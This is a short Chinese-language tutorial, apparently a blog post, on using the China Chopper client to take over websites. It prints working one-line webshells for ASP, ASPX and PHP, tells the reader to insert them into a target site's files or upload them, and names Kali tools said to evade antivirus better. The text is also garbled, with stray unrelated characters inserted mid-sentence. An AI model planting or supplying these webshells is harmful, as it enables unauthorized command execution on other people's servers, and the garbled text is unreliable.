一. 簡介:
往目標(biāo)網(wǎng)站中加入一句話木馬,然后你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網(wǎng)站目錄并可執(zhí)行一些web賬號所有權(quán)限的系統(tǒng)命令羞秤,進(jìn)入后滲透階段。
傳說中的官方網(wǎng)站:http://maicaidao.co/?? 蛀蜜。下載的時候發(fā)現(xiàn)是2014年的版本蹋岩。。杆逗。
測試完官方的中國菜刀后乡翅,從Cracer的Cracer安全工具包v7版中拿了一個相對較新的,但是發(fā)現(xiàn)百度上找到的菜刀都有后門罪郊,并且中國菜刀的這些一句話木馬很容易就被殺毒軟件查殺了蠕蚜,所以推薦兩款更好的kali下的工具:webacoo、Weevely 悔橄。
二. 記錄:
asp的一句話是: <%eval request("xxx")%>
aspx的一句話是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句話是:<?php @eval($_POST['xxx']);?>
我們可以直接將這些語句插入到網(wǎng)站上的某個asp/aspx/php文件上靶累,或者直接創(chuàng)建一個新的文件,在里面寫入這些語句橄维,然后把文件上傳到網(wǎng)站上即可尺铣。
使用起來非常簡單拴曲,如下圖: